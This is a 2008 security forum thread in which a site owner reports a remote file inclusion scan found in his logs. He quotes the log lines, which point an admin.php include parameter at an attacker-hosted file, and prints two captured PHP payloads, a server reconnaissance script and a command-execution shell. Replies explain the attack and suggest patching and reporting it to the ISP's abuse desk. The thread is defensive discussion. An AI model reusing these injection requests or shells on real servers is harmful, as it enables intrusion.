-
January 3rd, 2008, 05:31 AM
#1
Who's attacking the Wolfman?
The Wolfman was reviewing my server logs today when I came across this:
Code:
//admin.php?include_path=http://thermair.co.uk//media/logs/Goid.txt??
Http Code: 404 Date: Jan 02 18:41:25 Http Version: HTTP/1.1 Size in Bytes: -
Referer: - Agent: libwww-perl/5.808
67.15.175.50
/gbook//admin.php?include_path=http://thermair.co.uk//media/logs/Goid.txt??
Http Code: 200 Date: Jan 02 18:44:32 Http Version: HTTP/1.1 Size in Bytes: 4290
Referer: - Agent: libwww-perl/5.808
67.15.175.50
It looks like someone has written a perl script that is testing my directories for the presence of an admin.php that is vulnerable to a parameter injection attack.
The second attempt actually found my gbook directory which is used by my Ghoulbook. I'm guessing the script spidered my site for admin.php. For all admin.php files discovered, it attempted the injection.
Here is the content of Goid.txt
Code:
<?
echo "IndoServ<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "IndoServ IRC NetWork<br>";
exit;
?>
It looks like Goid.txt is trying to display information about my server and my user account.
http://thermair.co.uk/ is an Air treatment company in the UK. They are probably unaware that there site is being used to harbour internet attacks against web servers.
A search of the source IP address 67.15.175.50 shows that others have also been attacked.
So here are my questions:
1) Has anyone seen this before?
2) Do you think the Wolfman should notify the Air Treatment company?
Thanks
-
January 3rd, 2008, 05:48 AM
#2
Here is another script being run against my server. I guess this is more popular then I first thought.
Code:
<?php
echo "jimmywho";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
-
January 3rd, 2008, 06:16 AM
#3
Advanced Guest Book has been known to have vulnerabilities. The specific script they are running against you is a remote file inclusion where they attempt to execute commands on your server.
It's probably just someone scanning for web vulns. You can see it was a script by looking at the user agent. "libwww-per/5.808". As always, stay current on your updates and check your logs.
Quitmzilla is a firefox extension that gives you stats on how long you have quit smoking, how much money you\'ve saved, how much you haven\'t smoked and recent milestones. Very helpful for people who quit smoking and used to smoke at their computers... Helps out with the urges.
-
January 3rd, 2008, 07:16 AM
#4
There's a handful of things it could be. But whatever the person is using, the intent is the same. By the looks of it, the person/bot is just doing recon. The next step is attack. You should definately whois the air company and inform the admin and keep an eye on your logs. I'd ban the IP from my server.
Also, online ip tracers are a very handy tool. If you enter that IP into one like http://visualiptrace.visualware.com, you'll see it traces back to Houston TX, and the ISP's number is 214-782-7802, and abuse contact is abuse@theplanet.com.
Save your logs. Paired with the google results, your next step should be to contact the ISP's abuse dept and have that problem handled right there. Make it clear you have evidence (logs+results) that this person is intentionally scanning for vulnerabilities and actively trying to exploit them, otherwise they may just brush you off as another paranoid user.
-
January 3rd, 2008, 09:07 AM
#5
When and if you do send an email to the abuse address. Don't put your analysis in there. Just the plain facts (relevant sections of your logs) as clear text in the body (no attachments). And don't use HTML email.
If you don't do it properly your abuse complaint may end up in the bitbucket.
Oliver's Law:
Experience is something you don't get until just after you need it.
-
January 3rd, 2008, 02:42 PM
#6
Originally Posted by phishphreek
Advanced Guest Book has been known to have vulnerabilities. The specific script they are running against you is a remote file inclusion where they attempt to execute commands on your server.
It's probably just someone scanning for web vulns. You can see it was a script by looking at the user agent. "libwww-per/5.808". As always, stay current on your updates and check your logs.
I will 2nd this.
also do a whois on the IP as it is most likely a proxy.
-
January 3rd, 2008, 08:23 PM
#7
I just ignore stuff like that. The only time you have to worry about it is if you're running the web application they're trying to exploit. I have fun collecting their remote include scripts though
-
January 3rd, 2008, 09:46 PM
#8
^^ When it comes to your server's security, ignorance is not bliss.
-
January 4th, 2008, 05:04 AM
#9
Thanks everyone for the great advice. I've contacted the abuse team at theplanet.com, where the attack is coming from. Hopefully I will receive a response soon.
Similar Threads
-
By wolfman1984 in forum Roll Call
Replies: 21
Last Post: September 6th, 2007, 04:41 AM
-
By Nizead in forum Cryptography, Steganography, etc.
Replies: 0
Last Post: March 21st, 2003, 03:49 PM
-
By geepod in forum AntiVirus Discussions
Replies: 8
Last Post: June 13th, 2002, 12:03 PM
-
By blayde in forum Non-Security Archives
Replies: 5
Last Post: November 18th, 2001, 04:20 PM
-
By scorpion in forum Security Archives
Replies: 10
Last Post: October 23rd, 2001, 11:22 AM
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|